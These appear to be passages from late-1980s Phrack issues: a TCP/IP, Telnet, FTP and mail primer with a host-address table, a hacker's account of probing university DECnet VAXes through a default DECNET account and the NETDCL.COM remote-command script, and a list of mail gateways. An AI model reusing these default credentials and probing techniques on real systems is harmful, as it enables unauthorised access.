stud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vernment officials and others.  Being a part of this community is bo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iting and challeng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of the Future Transcendent Saga gives a general description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ocols and software used in MIDnet and the NSFNet.  A discussion of sev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more commonly used networking tools is also included to enable you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practical use of the network as soon as possi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OD Protocol Su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OD Protocol Suite includes many different protocols.  Each protocol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ation of how communication is to occur between computers.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ware and software vendors use the protocol to create programs and someti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alized hardware in order to implement the network function intended b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ocol.  Different implementations of the same protocol exist for the var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ware and operating systems found in a ne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hree most commonly used network functions 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 Sending and receiving messa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Transfer -- Sending and receiving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Login  -- Logging into a distant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se, mail is probably the most commonly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TCP/IP world, there are three different protocols that realize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TP   -- (Simple Mail Transfer Protocol)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TP    -- (File Transfer Protocol) sending and receiving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net -- Remote log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use these protocols is discussed in the next section.  At first gl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not obvious why these three functions are the most common.  After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and file transfer seem to be the same thing.  However, mail messag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identical to files, since they are usually comprised of only ASC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acters and are sequential in structure.  Files may contain binary data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complicated, non-sequential structures.  Also, mail messages can usu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lerate some errors in transmission whereas files should not contain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rrors.  Finally, file transfers usually occur in a secure setting (i.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who are transferring files know each other's names and passwords and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itted to transfer the file, whereas mail can be sent to anybody as long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r name is kn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mail and transfer accomplish the transfer of raw information from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to another, Telnet allows a distant user to process that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ther by logging in to a remote computer or by linking to another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net is most often used to remotely log in to a distant computer, but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ually a general-purpose communications protocol.  I have found it incredib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ful over the last year.  In some ways, it could be used for a great deal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ss because you can directly connect to another computer anywhere that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CP/IP capabilities, however please note that Telnet is *NOT* Tele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other functions that some networks provide, including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ame to address translation for networks, computers and peo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current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Quote of the day or fort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rinting on a remote printer, or use of any other remote periph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ubmission of batch jobs for non-interactive execu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ialogues and conferencing between multiple u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mote procedure call (i.e. Distributing program execution over sev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mote compu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ransmission of voice or video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of these functions are still in the experimental stages and require fa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networks than currently exist.  In the future, new functions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oubtedly be invented and existing ones impro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OD Protocol Suite is a layered network architecture, which mean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functions are performed by different programs that work independen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n harmony with each other.  Not only are there different programs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different protocols.  The protocols SMTP, FTP and Telnet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cribed above.  Protocols have been defined for getting the current tim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ote of the day, and for translating names.  These protocols are ca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s protocols because users directly interact with the program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lement these protoco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ransmission Control Protocol, TCP, is used by many of the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ocols.  Users almost never interact with TCP directly.  TCP establishe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iable end-to-end connection between two processes on remote computers.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sent through a network in small chunks called packets to improve reli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erformance.  TCP ensures that packets arrive in order and without err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a packet does have errors, TCP requests that the packet be retransmit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urn, TCP calls upon IP, Internet Protocol, to move the data from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to another.  IP is still not the lowest layer of the architec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there is usually a "data link layer protocol" below it.  This can be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number of different protocols, two very common ones being X.25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her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TP, Telnet and SMTP are called "application protocols", since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ly used by applications programs that enable users to make us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Network applications are the actual programs that implement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ocols and provide an interface between the user and the computer.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lementation of a network protocol is a program or package of program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s the desired network function such as file transfer.  Since compu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er from vendor to vendor (e.g. IBM, DEC, CDC), each computer must have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n implementation of these protocols.  However, the protocols are standardiz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at computers can interoperate over the network (i.e. Can understan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ss each other's data).  For example, a TCP packet generated by an IB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can be read and processed by a DEC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many instances, network applications programs use the name of the protoc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xample, the program that transfers files may be called "FTP" a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that allows remote logins may be called "Telnet."  Sometimes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ocols are incorporated into larger packages, as is common with SMTP.  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s have mail programs that allow users on the same computer to send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each other.  SMTP functions are often added to these mail programs so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can also send and receive mail through a network.  In such cases,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no separate program called SMTP that the user can access, since th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provides the user interface to this network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implementation of network protocols, such as FTP, are tailored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hardware and operating system on which they are used.  Therefor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ct user interface varies from one implementation to another.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TP protocol specifies a set of FTP commands which each FTP implement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t understand and process.  However, these are usually placed at a low lev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ten invisible to the user, who is given a higher set of commands to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higher-level commands are not standardized so they may vary from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lementation of FTP to another.  For some operating systems, not all of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s make equal sense, such as "Change Directory," or may have differ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ings.  Therefore the specific user interface that the user sees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bably di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ile describes a generic implementation of the standard TCP/IP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ocols.  Users must consult local documentation for specifics at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mes and Addresses In A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DOD Protocol Suite, each network is given a unique identifying number.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is assigned by a central authority, namely the Network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er run by SRI, abbreviated as SRI-NIC, in order to prevent more than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from having the same network number.  For example, the ARPAnet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number 10 while MIDnet has a longer number, namely 128.24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ch host in a network has a unique identification so other hosts can spec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 unambiguously.  Host numbers are usually assigned by the organization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ages the network, rather than one central authority.  Host numbers do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 to be unique throughout the whole Internet but two hosts on the s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need to have unique host numb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mbination of the network number and the host number is called the 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 of the host and is specified as a 32-bit binary number.  All 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es in the Internet are expressible as 32-bit numbers, although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ten written in dotted decimal notation.  Dotted decimal notation break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2-bit number into four eight-bit parts or octets and each octet is specif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a decimal number.  For example, 00000001 is the binary octet that specif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cimal number 1, while 11000000 specifies 192.  Dotted decimal not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IP addresses much easier to read and reme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s in the Internet are also identified by hostnames, which are str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characters, such as "phrackvax."  However, IP packets must specif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2-bit IP address instead of the hostname so  some way to translating hostna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P addresses must exi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way is to have a table of hostnames and their corresponding IP addre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ed a hosttable.  Nearly every TCP/IP implementation has such a hostt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the weaknesses of this method are forcing a shift to a new sche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ed the domain name system.  In UNIX systems, the hosttable is often ca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c/hosts."  You can usually read this file and find out what the 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es of various hosts are.  Other systems may call this file by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erent name and make it unavailable for public vie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of computers are generally given accounts to which all charge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use are billed.  Even if computer time is free at an install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unts are used to distinguish between the users and enforc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ions.  The generic term "username" will be used in this file to ref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ame by which the computer account is acces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early days of the ARPAnet which was the first network to use the TCP/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ocols, computer users were identified by their username, followed by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ercial "at" sign (@), followed by the hostname on which the accou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isted.  Networks were not given names, per se, although the IP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ed a network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xample, "knight@phrackvax" referred to user "knight" on host "phrackv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did not specify which network "phrackvax" was on, although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could be obtained by examining the hosttable and the IP addres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ackvax."  (However, "phrackvax" is a ficticious hostname used for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en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time went on, every computer on the network had to have an entry in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sttable for every other computer on the network.  When several netwo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ed together to form the Internet, the problem of maintaining this cent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sttable got out of hand.  Therefore, the domain name scheme was introduc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lit up the hosttable and make it smaller and easier to maint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new domain name scheme, users are still identified by their userna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hosts are now identified by their hostname and any and all domains of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are a part.  For example, the following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IGHT@UMCVMB.MISSOURI.EDU" specifies username "KNIGHT" on host "UMCV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 host "UMCVMB" is a part of the domain "MISSOURI" " which is in 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 of the domain "EDU".  There are other domains in "EDU", although only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named "MISSOURI".  In the domain "MISSOURI", there is only one host nam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MCVM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 other domains in "EDU" could theoretically have hosts named "UMCV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I would say that this is rather unlikely in this example).  Thu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bination of hostname and all its domains makes it unique.  The method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lating such names into IP addresses is no longer as straightforward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ing up the hostname in a table.  Several protocols and specialized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ftware called nameservers and resolvers implement the domain name sche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all TCP/IP implementations support domain names because it is rath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ose cases, the local hosttable provides the only way to transl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stnames to IP addresses.  The system manager of that computer will hav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an entry into the hosttable for every host that users may want to conn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n some cases, users may consult the nameserver themselves to find o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P address for a given hostname and then use that IP address directly inst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host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selected a few network hosts to demonstrate how a host system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ed by both the hostname and host numerical address.  Some of the nodes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selected are also nodes on BITnet, perhaps even some of the others that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not make a note of due a lack of omniscent awareness about each and e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gle host system in the wor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 - - - - - - - - - - -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erical      Hostname                   Location                       BIT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72.0.39     ATHENA.MIT.EDU             (Mass. Institute of Technolo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0.0.73      SRI-NIC.ARPA               (DDN Network Informatio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6.21.0.13     MACBETH.STANFORD.EDU       (Stanford Univer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6.21.0.60     PORTIA.STANFORD.EDU        (Stanford Univer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2.11.131   ANDREW.CMU.EDU             (Carnegie Mellon University)   ANDR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3.254.13   LBL.GOV                    (Lawrence Berkeley Labrotories)   LB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6.4.7      RUTGERS.RUTGERS.EDU        (Rutgers Univer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59.99.1    CUCARD.MED.COLUMBIA.EDU    (Columbia Univer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102.18.3   AMES.ARC.NASA.GOV          (Ames Research Center [NAS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103.1.1    HARVARD.EDU                (Harvard University)          HARV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111.24.40  HUB.UCSB.EDU               (Univ. Of Calif-Santa Barba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115.14.1   LLL-WINKEN.LLNL.GOV        (Lawrence Livermore Labrator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143.2.7    UVAARPA.VIRGINIA.EDU       (University of Virgin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148.128.40 BROWNVM.BROWN.EDU          (Brown University)              BR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163.1.5    UKCC.UKY.EDU               (University of Kentucky)         UKC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183.10.4   NSSDCA.GSFC.NASA.GOV       (Goddard Space Flight Center [NA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186.4.18   RAI.CC.FSU.EDU             (Florida State University)        FS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206.1.1    UMCVMB.MISSOURI.EDU        (Univ. of Missouri-Columbia)   UMCV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208.1.15   MAX.ACS.WASHINGTON.EDU     (University of Washington)        M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228.1.2    CUNYVM.CUNY.EDU            (City University of New York)  CUNYV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9.10.1.6     NUHUB.ACS.NORTHEASTERN.EDU (Northeastern University)       NUHU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1.151.1.4    UMRVMA.UMR.EDU             (University of Missouri-Rolla) UMRVM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92.9.9.1      SUN.COM                    (Sun Microsystem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92.33.18.30   VM1.NODAK.EDU              (North Dakota State Univ.)    NDSUVM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92.33.18.50   PLAINS.NODAK.EDU           (North Dakota State Univ.)    NDSUVA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Note:  Not every system on BITnet has an IP address.  Likewise,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ery system that has an IP address is on BITnet.  Also, wh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me locations like Stanford University may have nodes on BIT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have hosts on the IP as well, this does not neccessar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ply that the systems on BITnet and on IP (the EDU domain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case) are the same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ttempts to gain unauthorized access to systems on the Inter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 not tolerated and is legally a federal offense.  At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sts, they take this very seriously, especially the govern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sts such as NASA's Goddard Space Flight Center, where they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 mind telling you so at the main prompt when you connec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ir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ever, some nodes are public access to an extent.  The D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twork Information Center can be used by anyone.  The serv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tabase there have proven to be an invaluable sourc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formation when locating people, systems, and other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at is related to the Inter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 - - - - - - - - - - -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login refers to logging in to a remote computer from a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ed to a local computer.  Telnet is the standard protocol in the D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ocol Suite for accomplishing this.  The "rlogin" program, provided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rkeley UNIX systems and some other systems, also enables remote log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purposes of discussion, the "local computer" is the computer to which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minal is directly connected while the "remote computer" is the computer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twork to which you are communicating and to which your terminal i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ly connec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some computers use a different method of attaching terminal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s, a better definition would be the following:  The "local computer"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mputer that you are currently using and the "remote computer"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on the network with which you are or will be communicating.  Not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erms "host" and "computer" are synonymous in the following discu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use Telnet, simply enter the command: TEL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rompt that Telnet gives is:  Telne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 you can specify where you want to Telnet to immediately and byp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he prompts and other delays by issuing the command:  TELNET [lo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help available by typing in ?.  This prints a list of all the va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commands that Telnet provides with a one-line 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net&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onnect to to another computer, use the open subcommand to open a conn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at computer.  For example, to connect to the host "UMCVMB.MISSOURI.ED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open umcvmb.missouri.ed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net will resolve (i.e. Translate, the hostname "umcvmb.missouri.edu" into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P address and will send a packet to that host requesting login.  If the rem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st decides to let you attempt a login, it prompts you for your usernam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word.  If the host does not respond, Telnet will "time out" (i.e. Wait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reasonable amount of time such as 20 seconds) and then terminate wit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ssage such as "Host not respon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 computer does not have an entry for a remote host in its hosttabl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cannot resolve the name, you can use the IP address explicitly in the tel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NET 26.0.0.73 (Note:  This is the IP address for the DDN Network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enter [SRI-NIC.AR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are successful in logging in, your terminal is connected to the rem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st.  For all intents and purposes, your terminal is directly hard-wir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host and you should be able to do anything on your remote terminal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do at any local terminal.  There are a few exceptions to this ru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e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net provides a network escape character, such as CONTROL-T. You can find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the escape character is by entering the "status" sub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net&gt; stat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change the escape character by entering the "escape" sub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net&gt; esca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type in the escape character, the Telnet prompt returns to your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 enter subcommands.  For example, to break the connection,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ually logs you off the remote host, enter the subcommand "q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net&gt; q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Telnet connection usually breaks when you log off the remote host, s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t" subcommand is not usually used to log o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are logged in to a remote computer via Telnet, remember that ther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ime delay between your local computer and the remote one.  This oft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omes apparent to users when scrolling a long file across the terminal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d they wish to cancel the scrolling by typing CONTROL-C or something simil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typing the special control character, the scrolling continu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al control character takes a certain amount of time to reach the rem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which is still scrolling information.  Thus response from the rem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will not likely be as quick as response from a local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you are remotely logged on, the computer you are logged on to effectiv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omes your "local computer," even though your original "local computer" st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iders you logged on.  You can log on to a third computer which would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ome your "local computer" and so on.  As you log out of each session,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 session becomes active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Trans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TP is the program that allows files to be sent from one computer to an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TP" stands for "File Transfer Protoc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start using FTP, a communications channel with another computer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is opened.  For example, to start using FTP and initiate a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 session with a computer on the network called "UMCVMB", you w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sue the following sub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TP UMCVMB.MISSOURI.ED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st "UMCVMB" will prompt you for an account name and password.  If your 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correct, FTP will tell you so, otherwise it will say "login incorrect."  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ain or abort the FTP program.  (This is usually done by typing a spec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ol character such as CONTROL-C.  The "program abort" character varies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to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 you will see the FTP prompt, which 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a number of subcommands of FTP.  The subcommand "?" will list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s and a brief description of each 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initiate a file transfer in either direction with FTP, either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host or to the remote host.  The "get" subcommand initiates a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 from the remote host (i.e. Tells the remote computer to send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local computer [the one on which you issued the "ftp" command]).  Simp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er "get" and  FTP will prompt you for the remote host's file name a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local host's file name.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tp&gt;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file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r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l file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 can abbreviate this by typing both file names on the same line as the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command.  If you do not specify a local file name, the new local file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called the same thing as the remote file.  Valid FTP subcommands to ge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include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theirfile my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doc.x2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ut" subcommand works in a similar fashion and is used to send a file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cal computer to the remote computer.  Enter the command "put" and FT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prompt you for the local file name and then the remote file name.  I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 cannot be done because the file doesn't exist or for some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son, FTP will print an error me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a number of other subcommands in FTP that allow you to do many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Not all of these are standard so consult your local documentation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a question mark at the FTP prompt.  Some functions often built into FT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ude the ability to look at files before getting or putting the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ility to change directories, the ability to delete files on the rem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and the ability to list the directory on the remote ho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intriguing capability of many FTP implementations is "third par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s."  For example, if you are logged on computer A and you want to ca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B to send a file to computer C, you can use FTP to connect to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and use the "rmtsend" command.  Of course, you have to know username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words on all three computers, since FTP never allows you to peek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one's directory and files unless you know their username and pass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d" subcommand changes your working directory on the remote hos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cd" subcommand changes the directory on the local host.  For UNIX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aning of these subcommands is obvious.  Other systems, especially th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do not have directory-structured file system, may not implement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s or may implement them in a different mann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ir" and "ls" subcommands do the same thing, namely list the files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ing directory of of the remote ho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st" subcommand shows the contents of a file without actually putting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a file on the local computer.  This would be helpful if you just want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pect a file.  You could interrupt it before it reached the end of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yping CONTROL-C or some other special character.  This is dependent on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TP implemen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lete" command can delete files on the remote host.  You can also m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remove directories on the remote host with "mkdir" and "rmdi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tus" subcommand will tell you if you are connected and with whom and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te of all your options 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are transferring binary files or files with any non-print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acters, turn binary mode on by entering the "binary" sub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n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sume non-binary transfers, enter the "ascii" sub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ring a number of files can be done easily by using "mput" (multi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and "mget" (multiple get).  For example, to get every file in a particul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y, first issue a "cd" command to  change to that directory and then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get" command with an asterisk to indicate every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d somedirec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g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are done, use the "close" subcommand to break the communications li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ill still be in FTP, so you must use the "bye" subcommand to exit FTP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turn to the command level.  The "quit" subcommand will close the conn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exit from FTP at the same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is the simplest network facility to use in many ways.  All you have to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create your message, which can be done with a file editor or on the sp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moment, and then send it.  Unlike FTP and Telnet, you do not ne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the password of the username on the remote computer.  This is so beca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not change or access the files of the remote user nor can you use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unt to run programs.  All you can do is to send a me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probably a program on your local computer which does mail betw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on that computer.  Such a program is called a mailer.  This may or m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be the way to send or receive mail from other computers on the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integrated mailers are more and more common.  UNIX mailers w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as an example in this discu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at the protocol which is used to send and receive mail over a TCP/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is called SMTP, the "Simple Mail Transfer Protocol."  Typically,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not use any program called SMTP, but rather your local mail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X mailers are usually used by invoking a program named "mail".  To rece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mail, simply type "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everal varieties of UNIX mailers in existence.  Consult your lo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umentation for details.  For example, the command "man mail" prints o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ual pages for the mail program on your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nd mail, you usually specify the address of the recipient on th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  For example: "mail knight@umcvmb.missouri.edu" will se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ing message to username "knight" on host "umcvm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usually type in your message one line at a time, pressing RETURN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ch line and typing CONTROL-D to end the message. Other facilities to inclu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ready-existing files sometimes exist.  For example, Berkeley UNIXes allow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enter commands similar to the following to include a file in your curr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me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 my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example, the contents of "myfile" are inserted into the message at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UNIX systems allow you to send a file through the mail by using in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irection.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knight@umcvmb.missouri.edu &lt; my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example, the contents of "myfile" are sent as a message to "knight"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mcvm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at in many UNIX systems the only distinction between mail boun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user on the same computer and another user on a remote computer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the address specified.  That is, there is no hostname for lo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ipients.  Otherwise, mail functions in exactly the same way.  This is comm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integrated mail packages.  The system knows whether to send th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lly or through the network based on the address and the user is shiel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any other detai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Quest For Knowledge Is Without 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_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ack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olume Three, Issue 27, File 7 of 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lt;:&gt;&lt;:&gt;&lt;:&gt;&lt;:&gt;&lt;:&gt;&lt;:&gt;&lt;:&gt;&lt;:&gt;&lt;:&gt;&lt;:&gt;&lt;:&gt;&lt;:&gt;&lt;:&gt;&lt;:&gt;&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The Making Of A Hacker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by Framstag of West Germany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June 2, 1989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                                          &l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lt;:&gt;&lt;:&gt;&lt;:&gt;&lt;:&gt;&lt;:&gt;&lt;:&gt;&lt;:&gt;&lt;:&gt;&lt;:&gt;&lt;:&gt;&lt;:&gt;&lt;:&gt;&lt;:&gt;&lt;:&gt;&l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logue For None VMS U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Cnet is the network for DEC machines, in most cases you can say VA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net allows you to do:   - e-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file trans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remote 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remote comm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remote job en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NE is an interactive communication between users and is equal to TA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UNIX or a "deluxe"-CHAT on VM/C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LWUE, the university network of the state Baden-Wuerttemberg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st Germany contains (besides other networks) a DECnet with about 400 VA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every VAX there is standard-account called DECNET with pw:= DECNET, which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reachable via remote login.  This account is provided for sev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net-Utilities and as a pseudo-guest-account.  The DECNET-account has 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tricted privileges:  You cannot edit a file or make another remote log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HELP-menu is equipped by the system and is similar to the MAN comm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UN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re information on DECnet can be found in "Looking Around In DECnet"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ep Thought in this very issue of Phrack I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 - - - - - - - - - - -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re, at the University of Ulm, we have an *incredibly* ignorant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er staff, with an even bigger lack of system-literature (besides the 80 k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VAX/VMS-manuals).  The active may search for information by himself,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over the level of "run," "FORTRAN," or "logout."  My good luck that I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accounts in the BELWUE-DECnet, where more information is offered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I am a regular student in Ulm and all my accounts are completely leg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orresponding to the German laws.  I don't call myself a "hacker," I fe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like a "user" (...it's more a defining-probl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the HELP-menu in a host in Tuebingen I found the file netdcl.co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rresponding explanation, which sends commands to the DECNET-Accoun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VAXes and executes them there (remote command).  The explanation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P-menu was idiot-proof -- therefore for me, t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the command "$ mcr ncp show known nodes" you can obtain a list of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ide active VAXes, as is generally known, and so I pinged all these VAXe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 for more information for a knowledge-thirsty user.  With "help", "di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similar commands I look around on those DECnet accounts, always wa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opics related to the BELWUE-network.  It's a pity, that 2/3 of all VA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locked the DECNET-Account for NETDCL.COM.  Their system manager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bably afraid of unauthorized access, but I cannot imagine how there c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h an unauthorized access, because you cannot log on this account --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ce for trojan horse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me system managers called me back after I visited their VAX to chat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bout the network and asked me if they could help me in any way. One sys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Stuttgart even sent me a version of NETDCL.COM for the ULTRIX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n, after a month, the  H O R R O R  came over me in shape of a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ing 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UEBINGEN::SYSTEM       31-MAY-1989 15:31:11.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RAMSTA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j:   don't make any crap, or you'll be kicked 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ITTGPX::SYSTEM       29-MAY-1989 16:4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UEBINGEN::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j:   System-breaking-in 01-May-19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system manager of the Computer TUEBING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May 1st 1989 we had a System-breaking-in in our DECNET-account,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ed from your machine.  By help of our accounting we ascertained your us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MSTAG to have emulated an interactive log-on on our backbone-node and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machine of our VAX-cluster with the "trojan horse" NETDCL.COM.  Give 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user's name and address and dear up the occurrence completely.  We po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that the user is punishable.  In case of repetition we would be forc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corresponding measures.  We will check whether our system got injured.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this time we will disregard any measure.  Inform us via DECnet about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estigation results -- we are attainable by the nodenumber 1084::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Ing. Michael Ha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y system manager threatened me with the deleting of my account, if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not immediately enlighten the affair.  *Gul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was conscious about my innocence, but how to tell it to the others?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ined, step by step, everything to my system manager.  He then underst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a while, but the criminal procedure still hovered over me... so, I t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ckly to my keyboard, to compose file of explanations and to send it to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gry system manager in Stuttgart (node 1084 is an institute there).  But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out:  He had run out of disk quota and my explanation-mail sailed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rwan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ail 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1084::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E, error sending to user SYSTEM at 108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E-OPENOUT, error opening SYS$SYSROOT:[SYSMGR]MAIL$00040092594FD194.MA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out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MS-E-CRE, ACP file create fa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F-EXDISKQUOTA, disk quota excee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so the attempt of a connection with the PHONE-facilty failed:  In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rderless hacker-paranoia, he cut off his PHONE... and nowhere is a list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AL-addresses of the virtual DECnet-addresses available (to prev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ing).  Now I stood there with the brand "DANGEROUS HACKER!" and I had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ce to vindicate myself.  I poured out my troubles to an acquaintanc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e, who is a sysop in the computer-center in Freiburg.  He asked other syso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anagers thru the whole BELWUE-network until someone gave him a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after a few days -- and that was the right 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phoned to this Hager and told him what I had done with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net-account and also what NOT.  I wanted to know which crime I h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itted.  He promptly cancelled all of his reproaches, but he did not exc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defamous incriminations.  I entreated him to inform my system manager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ebingen that I have done nothing illegal and to stop him from erasing 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unt.  This happens already to a fellow student of mine (in this case, Ha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also guilty).  He promised me that he would officially cancel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roac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fter over a week this doesn't happen (I'm allowed to use my accou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rther on).  In return for it, I received a new mail from Hager on an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unt of m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1084::HAGER         1-JUN-1989 12:5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50180::STUD_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j:   System-breaking-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June 1st 1989 you have committed a system-breaking-in on at least one of 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Xes.  We were able to register this occurrence.  We would be forced to t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rther measure if you did not dear up the occurrence completely until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course the expenses involved would be imposed on you.  Hence enlighten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t be in your own inter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ttainable via DECnet-mail with the address 1084::HAGER or via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itut fuer Technische Thermodynamik und Thermische Verfahrenstechni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Ing. M. Hager    Tel.: 0711/685-610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Ing. M. Mrzyglod Tel.: 0711/685-339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affenwaldring 9/10-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0 Stuttgart-8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Ha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Mrzygl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as the reaction of my attempt: "$ PHONE 1084::SYSTEM".  I have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swered to this mail.  I AM SICK OF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amsta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AMSTAG@DTUPEV5A.BIT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Special Thanks For Translation Assistance To Schrulli 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_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ack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olume Three, Issue 28, File #4 of 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twork Miscell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y Taran K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une 1, 19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S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stralian Computer Science Network (ACSNET), also known as Oz, has its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CSNET node munnari.oz.au and if you cannot directly mail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z.au domain, try either username%munnari.oz.au@UUNET.UU.NET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nnari!username@UUNET.UU.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amp;T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amp;T Mail is a mailing service of AT&amp;T, probably what you might call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CI-Mail equivalent.  It is available on the UUCP network as node name att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ve had problems having mail get through.  Apparently, it does cost mon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ail to this service and the surrounding nodes are not willing to pick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ab for the ingoing mail, or at least, this has seemingly been the c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us far.  I believe, though, that perhaps routing to att!attmail!user w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amp;T recently announced six new X.400 interconnections between AT&amp;T Mail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 mail services in the U.S., Korea, Sweden, Australia, and Fin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U.S., AT&amp;T Mail is now interconnected with Telenet Communi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poration's service, Telemail, allowing users of both services to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ssages easily.  With the addition of these interconnections, the AT&amp;T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teway 400 Service allows AT&amp;T Mail subscribers to exchange messages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of the following electronic messaging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E-Mail Name*            Coun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Delta                  TeDe 400                Swed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C                        MPS400                  Austral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m-Canada             Envoy100                Cana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COM                      DACOM MHS               Kore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mp;T-Tele                   MailNet 400             Fin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sinki Telephone Co.     ELISA                   Fin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Dialcom                 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net                    Telemail                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DD                        Messavia                Jap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ac                   ATLAS400                Fr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terconnections are based on the X.400 standard, a set of guideline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rmat, delivery and receipt of electronic messages recommended by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standards committee the CCITT.  International X.400 messa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ur a surcharge.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Cana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 note:            $.0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 message unit:    $.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other international lo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 note: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 message unit:    $.5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no surcharge for X.400 messages within the U.S.  The following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acts to speak with about mailing through these mentioned networks.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stions can be directed through AT&amp;T Mail's toll-free number, 1-800-624-567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atlas                     MHS Gateway:  mhs!da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Bernard Tardieu             Administrator:  Bob Nichol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ac                                    AT&a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3399283203                          Morristown, NJ  079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1 201 644 183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dialcom                   MHS Gateway:  mhs!eli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Mr. Laraman                 Administrator:  Ulla Karajalain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Nokia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th Plainfield, NJ  07080                 Phone:  0113580437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1 441 493 384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envoy                     MHS Gateway:  mhs!kd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Kin C. Ma                   Administrator:  Shigeo Lw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m Canada                              Kokusai Denshin Denwa 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1 613 567 7584                     Phone:  813347741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mailnet                   MHS Gateway:  mhs!o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Kari Aakala                 Administrator:  Gary W. Krumb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 Directorate Of Post &amp;                   AT&amp;T Information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35806921730                         Lincroft, NJ  077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ne:  +1 201 576 265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telemail                  MHS Gateway:  m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Jim Kelsay                  Administrator:  AT&amp;T Mail M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E Telenet Comm Corp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ton, VA  22096                           AT&a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1 703 689 6034                     Lincroft, NJ  088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ne:  +1 800 624 567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M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ly known as Intermail, the Commercial Mail Relay (CMR) Service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relay service between the Internet and three commercial electronic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US Sprint/Telenet, MCI-Mail, and DIALCOM systems (i.e. Comp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SFMAIL, and USDA-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important note:  The only requirement for using this mail gateway i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ork conducted must be DARPA sponsored research and other appro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vernment business.  Basically, this means that unless you've got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vernment-related business, you're not supposed to be using this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ardless, it would be very difficult for them to screen everything that g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ir gateway.  Before I understood the requirements of this gateway,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sending to a user of MCI-Mail and was not contacted about any problems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communication.  Unfortunately, I mistyped the MCI-Mail address on on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etters and that letter ended up getting read by system administrators wh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informed me that I was not to be using that system, as well as the fa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y would like to bill me for using it.  That was an interesting thou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ir part anyway, but do note that using this service does incur char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MR mailbox address in each system corresponds to the lab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lemail:  [Intermail/USCISI]TELEMAIL/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CI-Mail:  Intermail      or      107-823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pMail:  Intermail      or      CMP081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SF-Mail:  Intermail      or      NSF15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DA-Mail:  Intermail      or      AGS999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ing examples for each e-mail system ar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CI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3-4567             seven digit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erett T. Bowens    person's name (must be uniq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MP0123              three letters followed by three or four dig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Cooper             initial, then "." and then last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34:CMP0123          domain, then ":" and then combination syste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ount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SF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SF0123              three letters followed by three or four dig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Phillips           initial, then "." and then last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57:NSF0123          domain, then ":" and then combination syste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ount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DA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GS0123              three letters followed by three or four dig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Shifter            initial, then "." and then last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57:AGS0123          domain, then ":" and then combination syste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ount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NOC               user (directly on Tele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NOC/LODH          user/organization (directly on Tele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NOC/LODH]TELEMAIL/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r/organization]system branch/coun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are other Telenet system branches/countries that can be ma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MAIL/USA     NASAMAIL/USA     MAIL/USA            TELEMEMO/AUSTRAL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M/CANADA   TOMMAIL/CHILE    TMAILUK/GB          ITALMAIL/ITA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I/JAPAN        PIPMAIL/ROC      DGC/USA             FAAMAIL/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SFC/USA         GTEMAIL/USA      TM11/USA            TNET.TELEMAIL/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DA/US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MNET's ScienceNet is on the Telenet system MAIL/USA and to mail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the format would be [A.MAILBOX/OMNET]MAIL/USA.  The following are avail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divisions of OM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IR     Atmospheric Sci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ARTH   Solid Earth Sci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FE    Life Sci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CEAN   Ocean Sci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LAR   Interdisciplinary Polar Stud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PACE   Space Science and Remote Sen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is a list of DIALCOM systems available in the listed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ir domain and system numb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Name            Country             Domain Number    System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link-Dialcom         Australia           60               07, 08, 0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Canada              20               20, 21, 22, 23, 2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PT Databoks            Denmark             124              7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box                 Finland             127              6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box                 West Germany        30               15, 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Hong Kong           80               88, 8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rmail                 Ireland             100              7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ldnet                 Israel              50               05, 0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mail              Italy               130              65, 6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mail              Italy               1                66, 6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Japan               70               13,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Korea               1                5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m Gold            Malta               100              7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Mexico              1                5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mocom                 Netherlands         124              27, 28, 2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mocom                 Netherlands         1                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net                 New Zealand         64               01, 0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Puerto Rico         58               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box                 Singapore           88               10, 11,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Taiwan              1                5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m Gold            United Kingdom      100              01, 04, 1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8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USA                 1                29, 30, 31, 3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3, 34, 37, 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1-59, 61, 62, 6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0-9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You can also mail to username@NASAMAIL.NASA.GOV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rname@GSFCMAIL.NASA.GOV instead of going through the CMR gatewa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il to NASAMAIL or GSFC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more information and instructions on how to use CMR, send a message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 support group at intermail-request@intermail.isi.edu (you'll get basic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ve listed plus maybe a bit more).  Please read Chapter 3 of The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cendent Saga (Limbo to Infinity) for specifics on mailing to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ination mailing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SER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Serve is well known for its games and conferences.  It does, though,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ing capability.  Now, they have developed their own Internet domain, ca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SERVE.COM.  It is relatively new and mail can be routed through ei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T.CIS.OHIO-STATE.EDU or NORTHWESTERN.AR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 user%COMPUSERVE.COM@TUT.CIS.OHIO-STATE.EDU or re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UT.CIS.OHIO-STATE.EDU with NORTHWESTERN.AR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mpuServe link appears to be a polled UUCP connection at the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It is actually managed via a set of shell scripts and a comm ut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ed xcomm, which operates via command scripts built on the fly by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ipts during analysis of what jobs exist to go into and out of CompuSer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Serve subscriber accounts of the form 7xxxx,yyyy can be addressed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xxxx.yyyy@compuserve.com.  CompuServe employees can be addressed by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names in the csi.compuserve.com subdomain.  CIS subscribers write mail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inet:user@host.domain" to mail to users on the Wide-Area Networks, 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ateway:" is CompuServe's internal gateway access syntax.  The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erates fully-RFC-compliant head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ully extrapolate -- from the CompuServe side, you would use their EasyPl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system to send mail to someone in BITNET or the Internet.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nd me mail at my Bitnet id, you would address it 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ET:C488869%UMCVMB.BITNET@CUNYVM.CUNY.ED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to my Internet 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ET:C488869@UMCVMB.MISSOURI.ED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f you have a BITNET to Internet userid, this is a silly thing to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your connect time to CompuServe costs you money.  However, you can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nformation to let people on CompuServe contact YOU.  CompuServe Custo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says that there is no charge to either receive or send a message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et or BIT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S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Snet is a smaller network that connects to the Wide-Area Networks but char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ir service.  DASnet subscribers get charged for both mail to user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networks AND mail for them from users of other networks.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a brief description of DASnet, some of which was taken from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motional text let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Snet allows you to exchange electronic mail with people on more than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and networks that are interconnected with DASnet.  On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wbacks, though, is that, after being subscribed to these services, you m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subscribe to DASnet, which is a separate cost.  Members of Wide-Are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s can subscribe to DASnet too.  Some of the networks and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chable through DASnet include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A/net, ATT Mail, BIX (Byte Information eXchange), DASnet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lcom, EIES, EasyLink, Envoy 100, FAX, GeoMail, INET, MCI Mail, NW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aceNet/EcoNet, Portal Communications, The Meta Network, The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lemail, ATI's Telemail (Japan), Telex, TWICS (Japan), UNISON, UUCP,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LL, and Domains (i.e. ".COM" and ".EDU" etc.).  New systems are ad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l of the time.  As of the writing of this file, Connect, Gover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cNET, and The American Institute of Physics PI-MAIL are soon t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ec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get various accounts on DASnet inclu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Corporate Accounts -- If your organization wants more than one individu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bscrip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Site Subscriptions -- If you want DASnet to link directly to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ganization's electronic mail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nd e-mail through DASnet, you send the message to the DASnet account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ome system.  You receive e-mail at your mailbox, as you do now.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Area Networks, you send mail to XB.DAS@STANFORD.BITNET.  On the Subj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you type the DASnet address in brackets and then the username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side of them.  The real subject can be expressed after the user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parated by a "!"  (Example:  Subject:  [0756TK]randy!How's Phra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disadvantage of using DASnet as opposed to Wide-Area networks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st.  Subscription costs 